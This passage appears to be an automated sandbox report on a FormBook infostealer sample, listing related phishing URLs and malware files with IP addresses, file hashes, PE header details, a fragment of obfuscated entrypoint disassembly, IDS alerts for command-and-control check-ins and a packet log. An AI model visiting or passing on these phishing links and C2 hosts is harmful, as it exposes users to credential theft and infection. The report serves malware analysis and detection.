                                              https://deltacapoffers.com/prequalification.php?utm_source=klayvio&utm_medium=email&utm_campaign=scrapeddripcampaign&utm_id=efi&utm_term=efi&utm_content=scrapedlists6&_kx=YFJgSt5YAM6jpJldJ4ZDop7CB1jVRJhqJKw59Uk4HMU.QZibAuGet hashmaliciousUnknownBrowse
                                              • 104.17.25.14
                                              http://organismekina8at-my.sharepoint.com/:f:/g/personal/mariejoelle_tremblay_kina8at_ca/ErWnJRn_SWBKkEcx4yGorhMBtA4m6tEq5cYuHnwwp_z1SwGet hashmaliciousUnknownBrowse
                                              • 188.114.96.3
                                              slime crypted.exeGet hashmaliciousMassLogger RATBrowse
                                              • 104.21.48.1
                                              http://id1223.adsalliance.xyzGet hashmaliciousUnknownBrowse
                                              • 162.247.243.29
                                              Cardfactory Executed Agreement DocsID- Sign & Review..emlGet hashmaliciousHTMLPhisherBrowse
                                              • 104.18.11.207
                                              http://unioneconselvano.it/0kktkM-VkjxP-cvXwg-XC4J3-7f72j-pfTsY-7uK529r.phpGet hashmaliciousUnknownBrowse
                                              • 1.1.1.1
                                              https://www.google.ca/url?subgn1=https://www.fordbeckerandgutierrez.com&SQ=WA&SQ=F5&SQ=R7&TA=W4&SQ=L6&q=%2561%256d%2570%2F%2573%256D%2569%2568%256B%2538%252E%2564%2565%256B%2563%2568%256F%2562%2574%2569%2565%2577%252E%2563%256F%256D%252F%256A%2576%2561%256E%256E%2561%2574%2574%2565%256E%2540%2561%2572%2572%256F%2577%2562%2561%256E%256B%252E%2563%256F%256D&opdg=ejM&cFQ=QXo&STA=MHYGet hashmaliciousHTMLPhisherBrowse
                                              • 104.17.245.203
                                              https://emailcaptain.pages.dev/dimitar?login=eXVsdXlldl9hbkByZnMucnU=&page=_adobeGet hashmaliciousUnknownBrowse
                                              • 172.67.169.194
                                              DOCS974i7C63.pdfGet hashmaliciousHTMLPhisherBrowse
                                              • 104.17.25.14
                                              COMING-ASABCDEGROUPCOMPANYLIMITEDHKCSZ inquiry for MH raw material.exeGet hashmaliciousFormBookBrowse
                                              • 154.197.162.239
                                              FG5wHs4fVX.exeGet hashmaliciousFormBookBrowse
                                              • 156.226.63.13
                                              smQoKNkwB7.exeGet hashmaliciousFormBookBrowse
                                              • 156.226.63.13
                                              qlG7x91YXH.exeGet hashmaliciousFormBookBrowse
                                              • 156.226.63.13
                                              http://38133.xc.05cg.com/Get hashmaliciousUnknownBrowse
                                              • 156.224.208.119
                                              http://40608.xc.05cg.com/Get hashmaliciousUnknownBrowse
                                              • 156.224.208.119
                                              emips.elfGet hashmaliciousMiraiBrowse
                                              • 156.250.110.142
                                              PO_62401394_MITech_20250601.exeGet hashmaliciousFormBookBrowse
                                              • 154.197.162.239
                                              Order Inquiry.exeGet hashmaliciousFormBookBrowse
                                              • 154.197.162.239
                                              armv6l.elfGet hashmaliciousMiraiBrowse
                                              • 154.197.141.202
                                              VODANETInternationalIP-BackboneofVodafoneDEelitebotnet.mpsl.elfGet hashmaliciousMirai, OkiruBrowse
                                              • 92.208.12.103
                                              elitebotnet.x86.elfGet hashmaliciousMirai, OkiruBrowse
                                              • 188.100.79.179
                                              MACHINE SPECIFICATIONS.exeGet hashmaliciousFormBookBrowse
                                              • 47.83.1.90
                                              CSZ inquiry for MH raw material.exeGet hashmaliciousFormBookBrowse
                                              • 47.83.1.90
                                              1001-13.exeGet hashmaliciousFormBookBrowse
                                              • 47.83.1.90
                                              6.elfGet hashmaliciousUnknownBrowse
                                              • 92.73.125.182
                                              6.elfGet hashmaliciousUnknownBrowse
                                              • 47.82.15.239
                                              res.arm5.elfGet hashmaliciousUnknownBrowse
                                              • 84.61.102.254
                                              res.x86.elfGet hashmaliciousUnknownBrowse
                                              • 178.9.17.19
                                              BDlwy8b7Km.exeGet hashmaliciousFormBookBrowse
                                              • 47.83.1.90
                                              NAMECHEAP-NETUSDOCS974i7C63.pdfGet hashmaliciousHTMLPhisherBrowse
                                              • 198.54.116.113
                                              MACHINE SPECIFICATIONS.exeGet hashmaliciousFormBookBrowse
                                              • 199.192.21.169
                                              Payment Notification Confirmation Documents 09_01_2025 Paper bill.exeGet hashmaliciousFormBookBrowse
                                              • 68.65.122.71
                                              CSZ inquiry for MH raw material.exeGet hashmaliciousFormBookBrowse
                                              • 199.192.21.169
                                              1001-13.exeGet hashmaliciousFormBookBrowse
                                              • 162.0.236.169
                                              QsBdpe1gK5.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                              • 199.192.23.123
                                              rACq8Eaix6.exeGet hashmaliciousFormBookBrowse
                                              • 199.192.23.123
                                              plZuPtZoTk.exeGet hashmaliciousFormBookBrowse
                                              • 199.192.21.169
                                              5by4QM3v89.exeGet hashmaliciousFormBookBrowse
                                              • 199.192.23.123
                                              5CTbduoXq4.exeGet hashmaliciousFormBookBrowse
                                              • 63.250.43.134

                                              JA3 Fingerprints

                                              No context

                                              Dropped Files

                                              No context

                                              Created / dropped Files

                                              C:\Users\user\AppData\Local\Temp\17O3k-2I

                                              Download File
                                              Process:C:\Windows\SysWOW64\fc.exe
                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
                                              Category:modified
                                              Size (bytes):196608
                                              Entropy (8bit):1.1215420383712111
                                              Encrypted:false
                                              SSDEEP:384:r2qOB1nxCkvSAELyKOMq+8HKkjucswRv8p3:aq+n0E9ELyKOMq+8HKkjuczRv89
                                              MD5:9A809AD8B1FDDA60760BB6253358A1DB
                                              SHA1:D7BBC6B5EF1ACF8875B36DEA141C9911BADF9F66
                                              SHA-256:95756B4CE2E462117AF93FE5E35AD0810993D31CC6666B399BEE3B336A63219A
                                              SHA-512:2680CEAA75837E374C4FB28B7A0CD1F699F2DAAE7BFB895A57FDB8D9727A83EF821F2B75B91CB53E00B75468F37DC3009582FC54F5D07B2B62F3026B0185FF73
                                              Malicious:false
                                              Reputation:moderate, very likely benign file
                                              Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                              Static File Info

                                              General

                                              File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                              Entropy (8bit):7.96216415891094
                                              TrID:
                                              • Win32 Executable (generic) a (10002005/4) 99.96%
                                              • Generic Win/DOS Executable (2004/3) 0.02%
                                              • DOS Executable Generic (2002/1) 0.02%
                                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                              File name:CSZ inquiry for MH raw material.exe
                                              File size:298'496 bytes
                                              MD5:2a3034abc9b8ee8875f9cd98c388ab07
                                              SHA1:0cfe449dad046b2b0cf594841f675e9d21ecdb1d
                                              SHA256:b022e4df0d9e6c8eeea122e642708a9d13b8a7e861a4d121e0c54e80a28a1cc4
                                              SHA512:44829b1b0b603c9f429fe3dc33943125d5441f091026b856ddd8da311828de8be0e87349b5d35cf95e1a02940a98c39993002abd90184c3488cba96b4aad35e5
                                              SSDEEP:6144:C8ls/dPZs9JZY9iOKuxO9oTDFgxTFLVwkBDSiQ3ro+Z:Q/dhQJqiOKsPDOZLGeDk3r
                                              TLSH:E754221A5F25F206D1FE2973391F0B427676073DBE592F21B4992CA29990CFE5EC03A1
                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......y...=`g.=`g.=`g.....:`g.....<`g.....<`g.Rich=`g.........PE..L......`.................X...$...............p....@................

                                              File Icon

                                              Icon Hash:246d0d17b3315458

                                              Static PE Info

                                              General

                                              Entrypoint:0x401580
                                              Entrypoint Section:.text
                                              Digitally signed:false
                                              Imagebase:0x400000
                                              Subsystem:windows gui
                                              Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                              DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                              Time Stamp:0x60E3E289 [Tue Jul 6 04:56:41 2021 UTC]
                                              TLS Callbacks:
                                              CLR (.Net) Version:
                                              OS Version Major:6
                                              OS Version Minor:0
                                              File Version Major:6
                                              File Version Minor:0
                                              Subsystem Version Major:6
                                              Subsystem Version Minor:0
                                              Import Hash:

                                              Entrypoint Preview

                                              Instruction
                                              push ebp
                                              push esp
                                              pop ebp
                                              sub esp, 00000424h
                                              push ebx
                                              push esi
                                              push edi
                                              push 0000040Ch
                                              lea eax, dword ptr [ebp-00000420h]
                                              push 00000000h
                                              push eax
                                              mov dword ptr [ebp-00000424h], 00000000h
                                              call 00007FBAD07DC6FCh
                                              add esp, 0Ch
                                              sub ecx, ecx
                                              sub edi, edi
                                              xor esi, esi
                                              mov dword ptr [ebp-14h], 00000054h
                                              mov dword ptr [ebp-10h], 00003B15h
                                              mov dword ptr [ebp-0Ch], 00001B0Dh
                                              mov dword ptr [ebp-08h], 00004BD2h
                                              push edi
                                              pop edi
                                              inc ecx
                                              push ecx
                                              pop eax
                                              and eax, 80000007h
                                              jns 00007FBAD07DAB07h
                                              dec eax
                                              or eax, FFFFFFF8h
                                              inc eax
                                              jne 00007FBAD07DAB04h
                                              add ecx, ecx
                                              cmp ecx, 00000CB4h
                                              jl 00007FBAD07DAAE7h
                                              mov ecx, 00006ACDh
                                              mov eax, 92492493h
                                              imul ecx
                                              add edx, ecx
                                              sar edx, 05h
                                              push edx
                                              pop ecx
                                              shr ecx, 1Fh
                                              add ecx, edx
                                              jne 00007FBAD07DAAEDh
                                              mov eax, 00001819h
                                              push esi
                                              pop esi
                                              push 0000001Bh
                                              pop edx
                                              mov ecx, 000000C2h
                                              cmp ecx, edx
                                              cmovl ecx, edx
                                              dec eax
                                              jne 00007FBAD07DAAFAh
                                              mov ecx, 00001F5Ah
                                              mov eax, 82082083h
                                              imul ecx
                                              add edx, ecx
                                              sar edx, 06h
                                              push edx
                                              pop ecx
                                              shr ecx, 1Fh
                                              add ecx, edx
                                              jne 00007FBAD07DAAEDh
                                              call 00007FBAD07DC95Ah
                                              mov dword ptr [ebp-5Ch], eax
                                              push esi
                                              pop esi
                                              inc edi
                                              mov eax, 55555556h
                                              imul edi

                                              Rich Headers

                                              Programming Language:
                                              • [C++] VS2012 build 50727
                                              • [ASM] VS2012 build 50727
                                              • [LNK] VS2012 build 50727

                                              Data Directories

                                              NameVirtual AddressVirtual Size Is in Section
                                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_IMPORT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_RESOURCE0x470000x2358.rsrc
                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                              IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                              IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                              Sections

                                              NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                              .text0x10000x456940x458000c76c536aad0dd8789ecb1adb82e65e5False0.9885552495503597data7.995275199427175IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                              .rsrc0x470000x23580x24003f5572a8563784d4bacd9fd5cb4b3964False0.9434678819444444data7.754725785414912IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                              Resources

                                              NameRVASizeTypeLanguageCountryZLIB Complexity
                                              RT_ICON0x470b40x228dPNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced0.9710570944036179
                                              RT_GROUP_ICON0x493440x14data1.05

                                              Network Behavior

                                              Suricata IDS Alerts

                                              TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                              2025-01-13T15:12:00.551136+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.74997047.83.1.9080TCP
                                              2025-01-13T15:12:00.551136+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.74997047.83.1.9080TCP
                                              2025-01-13T15:12:16.130205+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.74997284.32.84.3280TCP
                                              2025-01-13T15:12:18.671305+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.74997384.32.84.3280TCP
                                              2025-01-13T15:12:21.231723+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.74997484.32.84.3280TCP
                                              2025-01-13T15:12:23.765934+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.74997584.32.84.3280TCP
                                              2025-01-13T15:12:23.765934+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.74997584.32.84.3280TCP
                                              2025-01-13T15:12:29.500646+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.749976104.21.18.17180TCP
                                              2025-01-13T15:12:32.013724+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.749977104.21.18.17180TCP
                                              2025-01-13T15:12:34.547791+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.749978104.21.18.17180TCP
                                              2025-01-13T15:12:37.125958+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.749979104.21.18.17180TCP
                                              2025-01-13T15:12:37.125958+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.749979104.21.18.17180TCP
                                              2025-01-13T15:12:43.965959+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.749980134.122.135.4880TCP
                                              2025-01-13T15:12:46.486294+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.749981134.122.135.4880TCP
                                              2025-01-13T15:12:49.063476+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.749982134.122.135.4880TCP
                                              2025-01-13T15:12:51.673190+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.749983134.122.135.4880TCP
                                              2025-01-13T15:12:51.673190+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.749983134.122.135.4880TCP
                                              2025-01-13T15:12:57.418188+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.749984199.192.21.16980TCP
                                              2025-01-13T15:12:59.875023+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.749985199.192.21.16980TCP
                                              2025-01-13T15:13:02.590146+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.749986199.192.21.16980TCP
                                              2025-01-13T15:13:04.984315+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.749987199.192.21.16980TCP
                                              2025-01-13T15:13:04.984315+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.749987199.192.21.16980TCP
                                              2025-01-13T15:13:11.105513+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.749988154.197.162.23980TCP
                                              2025-01-13T15:13:14.071351+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.749989154.197.162.23980TCP
                                              2025-01-13T15:13:16.637822+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.749990154.197.162.23980TCP

                                              Network Port Distribution

                                              TCP Packets

                                              TimestampSource PortDest PortSource IPDest IP
                                              Jan 13, 2025 15:11:58.877091885 CET4997080192.168.2.747.83.1.90
                                              Jan 13, 2025 15:11:58.884314060 CET804997047.83.1.90192.168.2.7
                                              Jan 13, 2025 15:11:58.884432077 CET4997080192.168.2.747.83.1.90
                                              Jan 13, 2025 15:11:58.893848896 CET4997080192.168.2.747.83.1.90
                                              Jan 13, 2025 15:11:58.901155949 CET804997047.83.1.90192.168.2.7
                                              Jan 13, 2025 15:12:00.550860882 CET804997047.83.1.90192.168.2.7
                                              Jan 13, 2025 15:12:00.551084042 CET804997047.83.1.90192.168.2.7
                                              Jan 13, 2025 15:12:00.551136017 CET4997080192.168.2.747.83.1.90
                                              Jan 13, 2025 15:12:00.554305077 CET4997080192.168.2.747.83.1.90
                                              Jan 13, 2025 15:12:00.560781956 CET804997047.83.1.90192.168.2.7
                                              Jan 13, 2025 15:12:15.652184963 CET4997280192.168.2.784.32.84.32
                                              Jan 13, 2025 15:12:15.657614946 CET804997284.32.84.32192.168.2.7
                                              Jan 13, 2025 15:12:15.657718897 CET4997280192.168.2.784.32.84.32
                                              Jan 13, 2025 15:12:15.672153950 CET4997280192.168.2.784.32.84.32
                                              Jan 13, 2025 15:12:15.677884102 CET804997284.32.84.32192.168.2.7
                                              Jan 13, 2025 15:12:16.129981995 CET804997284.32.84.32192.168.2.7
                                              Jan 13, 2025 15:12:16.130204916 CET4997280192.168.2.784.32.84.32
                                              Jan 13, 2025 15:12:17.188235998 CET4997280192.168.2.784.32.84.32
                                              Jan 13, 2025 15:12:17.192995071 CET804997284.32.84.32192.168.2.7
                                              Jan 13, 2025 15:12:18.207041025 CET4997380192.168.2.784.32.84.32
                                              Jan 13, 2025 15:12:18.211889029 CET804997384.32.84.32192.168.2.7
                                              Jan 13, 2025 15:12:18.212030888 CET4997380192.168.2.784.32.84.32
                                              Jan 13, 2025 15:12:18.226303101 CET4997380192.168.2.784.32.84.32
                                              Jan 13, 2025 15:12:18.231339931 CET804997384.32.84.32192.168.2.7
                                              Jan 13, 2025 15:12:18.671082020 CET804997384.32.84.32192.168.2.7
                                              Jan 13, 2025 15:12:18.671304941 CET4997380192.168.2.784.32.84.32
                                              Jan 13, 2025 15:12:19.735059977 CET4997380192.168.2.784.32.84.32
                                              Jan 13, 2025 15:12:19.741261959 CET804997384.32.84.32192.168.2.7
                                              Jan 13, 2025 15:12:20.754669905 CET4997480192.168.2.784.32.84.32
                                              Jan 13, 2025 15:12:20.761300087 CET804997484.32.84.32192.168.2.7
                                              Jan 13, 2025 15:12:20.761377096 CET4997480192.168.2.784.32.84.32
                                              Jan 13, 2025 15:12:20.775971889 CET4997480192.168.2.784.32.84.32
                                              Jan 13, 2025 15:12:20.783090115 CET804997484.32.84.32192.168.2.7
                                              Jan 13, 2025 15:12:20.785379887 CET804997484.32.84.32192.168.2.7
                                              Jan 13, 2025 15:12:21.231240034 CET804997484.32.84.32192.168.2.7
                                              Jan 13, 2025 15:12:21.231723070 CET4997480192.168.2.784.32.84.32
                                              Jan 13, 2025 15:12:22.282015085 CET4997480192.168.2.784.32.84.32
                                              Jan 13, 2025 15:12:22.289103985 CET804997484.32.84.32192.168.2.7
                                              Jan 13, 2025 15:12:23.303313017 CET4997580192.168.2.784.32.84.32
                                              Jan 13, 2025 15:12:23.308217049 CET804997584.32.84.32192.168.2.7
                                              Jan 13, 2025 15:12:23.308314085 CET4997580192.168.2.784.32.84.32
                                              Jan 13, 2025 15:12:23.317295074 CET4997580192.168.2.784.32.84.32
                                              Jan 13, 2025 15:12:23.322179079 CET804997584.32.84.32192.168.2.7
                                              Jan 13, 2025 15:12:23.765716076 CET804997584.32.84.32192.168.2.7
                                              Jan 13, 2025 15:12:23.765743971 CET804997584.32.84.32192.168.2.7
                                              Jan 13, 2025 15:12:23.765753984 CET804997584.32.84.32192.168.2.7
                                              Jan 13, 2025 15:12:23.765789986 CET804997584.32.84.32192.168.2.7
                                              Jan 13, 2025 15:12:23.765803099 CET804997584.32.84.32192.168.2.7
                                              Jan 13, 2025 15:12:23.765814066 CET804997584.32.84.32192.168.2.7
                                              Jan 13, 2025 15:12:23.765826941 CET804997584.32.84.32192.168.2.7
                                              Jan 13, 2025 15:12:23.765836954 CET804997584.32.84.32192.168.2.7
                                              Jan 13, 2025 15:12:23.765849113 CET804997584.32.84.32192.168.2.7
                                              Jan 13, 2025 15:12:23.765860081 CET804997584.32.84.32192.168.2.7
                                              Jan 13, 2025 15:12:23.765933990 CET4997580192.168.2.784.32.84.32
                                              Jan 13, 2025 15:12:23.766246080 CET4997580192.168.2.784.32.84.32
                                              Jan 13, 2025 15:12:23.770458937 CET4997580192.168.2.784.32.84.32
                                              Jan 13, 2025 15:12:23.776010990 CET804997584.32.84.32192.168.2.7
                                              Jan 13, 2025 15:12:28.806952000 CET4997680192.168.2.7104.21.18.171
                                              Jan 13, 2025 15:12:28.811862946 CET8049976104.21.18.171192.168.2.7
                                              Jan 13, 2025 15:12:28.811975002 CET4997680192.168.2.7104.21.18.171
                                              Jan 13, 2025 15:12:28.825917959 CET4997680192.168.2.7104.21.18.171
                                              Jan 13, 2025 15:12:28.830720901 CET8049976104.21.18.171192.168.2.7
                                              Jan 13, 2025 15:12:29.500003099 CET8049976104.21.18.171192.168.2.7
                                              Jan 13, 2025 15:12:29.500560999 CET8049976104.21.18.171192.168.2.7
                                              Jan 13, 2025 15:12:29.500646114 CET4997680192.168.2.7104.21.18.171
                                              Jan 13, 2025 15:12:30.328877926 CET4997680192.168.2.7104.21.18.171
                                              Jan 13, 2025 15:12:31.347290039 CET4997780192.168.2.7104.21.18.171
                                              Jan 13, 2025 15:12:31.352669954 CET8049977104.21.18.171192.168.2.7
                                              Jan 13, 2025 15:12:31.352787018 CET4997780192.168.2.7104.21.18.171
                                              Jan 13, 2025 15:12:31.365685940 CET4997780192.168.2.7104.21.18.171
                                              Jan 13, 2025 15:12:31.370737076 CET8049977104.21.18.171192.168.2.7
                                              Jan 13, 2025 15:12:32.012839079 CET8049977104.21.18.171192.168.2.7
                                              Jan 13, 2025 15:12:32.013632059 CET8049977104.21.18.171192.168.2.7
                                              Jan 13, 2025 15:12:32.013724089 CET4997780192.168.2.7104.21.18.171
                                              Jan 13, 2025 15:12:32.876203060 CET4997780192.168.2.7104.21.18.171
                                              Jan 13, 2025 15:12:33.894385099 CET4997880192.168.2.7104.21.18.171
                                              Jan 13, 2025 15:12:33.899266958 CET8049978104.21.18.171192.168.2.7
                                              Jan 13, 2025 15:12:33.899364948 CET4997880192.168.2.7104.21.18.171
                                              Jan 13, 2025 15:12:33.913347960 CET4997880192.168.2.7104.21.18.171
                                              Jan 13, 2025 15:12:33.918211937 CET8049978104.21.18.171192.168.2.7
                                              Jan 13, 2025 15:12:33.918370962 CET8049978104.21.18.171192.168.2.7
                                              Jan 13, 2025 15:12:34.546976089 CET8049978104.21.18.171192.168.2.7
                                              Jan 13, 2025 15:12:34.547673941 CET8049978104.21.18.171192.168.2.7
                                              Jan 13, 2025 15:12:34.547791004 CET4997880192.168.2.7104.21.18.171
                                              Jan 13, 2025 15:12:35.422513962 CET4997880192.168.2.7104.21.18.171
                                              Jan 13, 2025 15:12:36.440958977 CET4997980192.168.2.7104.21.18.171
                                              Jan 13, 2025 15:12:36.445987940 CET8049979104.21.18.171192.168.2.7
                                              Jan 13, 2025 15:12:36.446151972 CET4997980192.168.2.7104.21.18.171
                                              Jan 13, 2025 15:12:36.454006910 CET4997980192.168.2.7104.21.18.171
                                              Jan 13, 2025 15:12:36.458831072 CET8049979104.21.18.171192.168.2.7
                                              Jan 13, 2025 15:12:37.125741005 CET8049979104.21.18.171192.168.2.7
                                              Jan 13, 2025 15:12:37.125761986 CET8049979104.21.18.171192.168.2.7
                                              Jan 13, 2025 15:12:37.125957966 CET4997980192.168.2.7104.21.18.171
                                              Jan 13, 2025 15:12:37.128647089 CET4997980192.168.2.7104.21.18.171
                                              Jan 13, 2025 15:12:37.133599043 CET8049979104.21.18.171192.168.2.7
                                              Jan 13, 2025 15:12:43.003753901 CET4998080192.168.2.7134.122.135.48
                                              Jan 13, 2025 15:12:43.008826971 CET8049980134.122.135.48192.168.2.7
                                              Jan 13, 2025 15:12:43.008941889 CET4998080192.168.2.7134.122.135.48
                                              Jan 13, 2025 15:12:43.022403002 CET4998080192.168.2.7134.122.135.48
                                              Jan 13, 2025 15:12:43.027343035 CET8049980134.122.135.48192.168.2.7
                                              Jan 13, 2025 15:12:43.965837002 CET8049980134.122.135.48192.168.2.7
                                              Jan 13, 2025 15:12:43.965903044 CET8049980134.122.135.48192.168.2.7
                                              Jan 13, 2025 15:12:43.965959072 CET4998080192.168.2.7134.122.135.48
                                              Jan 13, 2025 15:12:44.532100916 CET4998080192.168.2.7134.122.135.48
                                              Jan 13, 2025 15:12:45.550400972 CET4998180192.168.2.7134.122.135.48
                                              Jan 13, 2025 15:12:45.555517912 CET8049981134.122.135.48192.168.2.7
                                              Jan 13, 2025 15:12:45.555644989 CET4998180192.168.2.7134.122.135.48
                                              Jan 13, 2025 15:12:45.567640066 CET4998180192.168.2.7134.122.135.48
                                              Jan 13, 2025 15:12:45.572504997 CET8049981134.122.135.48192.168.2.7
                                              Jan 13, 2025 15:12:46.485959053 CET8049981134.122.135.48192.168.2.7
                                              Jan 13, 2025 15:12:46.486238003 CET8049981134.122.135.48192.168.2.7
                                              Jan 13, 2025 15:12:46.486294031 CET4998180192.168.2.7134.122.135.48
                                              Jan 13, 2025 15:12:47.078727007 CET4998180192.168.2.7134.122.135.48
                                              Jan 13, 2025 15:12:48.110903025 CET4998280192.168.2.7134.122.135.48
                                              Jan 13, 2025 15:12:48.115844965 CET8049982134.122.135.48192.168.2.7
                                              Jan 13, 2025 15:12:48.115962029 CET4998280192.168.2.7134.122.135.48
                                              Jan 13, 2025 15:12:48.131705999 CET4998280192.168.2.7134.122.135.48
                                              Jan 13, 2025 15:12:48.136584044 CET8049982134.122.135.48192.168.2.7
                                              Jan 13, 2025 15:12:48.136657000 CET8049982134.122.135.48192.168.2.7
                                              Jan 13, 2025 15:12:49.063261032 CET8049982134.122.135.48192.168.2.7
                                              Jan 13, 2025 15:12:49.063344002 CET8049982134.122.135.48192.168.2.7
                                              Jan 13, 2025 15:12:49.063476086 CET4998280192.168.2.7134.122.135.48
                                              Jan 13, 2025 15:12:49.644454956 CET4998280192.168.2.7134.122.135.48
                                              Jan 13, 2025 15:12:50.660252094 CET4998380192.168.2.7134.122.135.48
                                              Jan 13, 2025 15:12:50.665170908 CET8049983134.122.135.48192.168.2.7
                                              Jan 13, 2025 15:12:50.665257931 CET4998380192.168.2.7134.122.135.48
                                              Jan 13, 2025 15:12:50.674694061 CET4998380192.168.2.7134.122.135.48
                                              Jan 13, 2025 15:12:50.679441929 CET8049983134.122.135.48192.168.2.7
                                              Jan 13, 2025 15:12:51.672843933 CET8049983134.122.135.48192.168.2.7
                                              Jan 13, 2025 15:12:51.672933102 CET8049983134.122.135.48192.168.2.7
                                              Jan 13, 2025 15:12:51.673190117 CET4998380192.168.2.7134.122.135.48
                                              Jan 13, 2025 15:12:51.675359011 CET4998380192.168.2.7134.122.135.48
                                              Jan 13, 2025 15:12:51.680198908 CET8049983134.122.135.48192.168.2.7
                                              Jan 13, 2025 15:12:56.707526922 CET4998480192.168.2.7199.192.21.169
                                              Jan 13, 2025 15:12:56.712377071 CET8049984199.192.21.169192.168.2.7
                                              Jan 13, 2025 15:12:56.712516069 CET4998480192.168.2.7199.192.21.169
                                              Jan 13, 2025 15:12:56.725663900 CET4998480192.168.2.7199.192.21.169
                                              Jan 13, 2025 15:12:56.730487108 CET8049984199.192.21.169192.168.2.7
                                              Jan 13, 2025 15:12:57.418040037 CET8049984199.192.21.169192.168.2.7
                                              Jan 13, 2025 15:12:57.418062925 CET8049984199.192.21.169192.168.2.7
                                              Jan 13, 2025 15:12:57.418072939 CET8049984199.192.21.169192.168.2.7
                                              Jan 13, 2025 15:12:57.418188095 CET4998480192.168.2.7199.192.21.169
                                              Jan 13, 2025 15:12:58.235446930 CET4998480192.168.2.7199.192.21.169
                                              Jan 13, 2025 15:12:59.256436110 CET4998580192.168.2.7199.192.21.169
                                              Jan 13, 2025 15:12:59.261501074 CET8049985199.192.21.169192.168.2.7
                                              Jan 13, 2025 15:12:59.261575937 CET4998580192.168.2.7199.192.21.169
                                              Jan 13, 2025 15:12:59.279766083 CET4998580192.168.2.7199.192.21.169
                                              Jan 13, 2025 15:12:59.284956932 CET8049985199.192.21.169192.168.2.7
                                              Jan 13, 2025 15:12:59.874948978 CET8049985199.192.21.169192.168.2.7
                                              Jan 13, 2025 15:12:59.874970913 CET8049985199.192.21.169192.168.2.7
                                              Jan 13, 2025 15:12:59.875022888 CET4998580192.168.2.7199.192.21.169
                                              Jan 13, 2025 15:13:00.781735897 CET4998580192.168.2.7199.192.21.169
                                              Jan 13, 2025 15:13:01.801675081 CET4998680192.168.2.7199.192.21.169
                                              Jan 13, 2025 15:13:01.806699038 CET8049986199.192.21.169192.168.2.7
                                              Jan 13, 2025 15:13:01.806915045 CET4998680192.168.2.7199.192.21.169
                                              Jan 13, 2025 15:13:01.824652910 CET4998680192.168.2.7199.192.21.169
                                              Jan 13, 2025 15:13:01.829771042 CET8049986199.192.21.169192.168.2.7
                                              Jan 13, 2025 15:13:01.829894066 CET8049986199.192.21.169192.168.2.7
                                              Jan 13, 2025 15:13:02.589643002 CET8049986199.192.21.169192.168.2.7
                                              Jan 13, 2025 15:13:02.589708090 CET8049986199.192.21.169192.168.2.7
                                              Jan 13, 2025 15:13:02.590146065 CET4998680192.168.2.7199.192.21.169
                                              Jan 13, 2025 15:13:03.328823090 CET4998680192.168.2.7199.192.21.169
                                              Jan 13, 2025 15:13:04.348114014 CET4998780192.168.2.7199.192.21.169
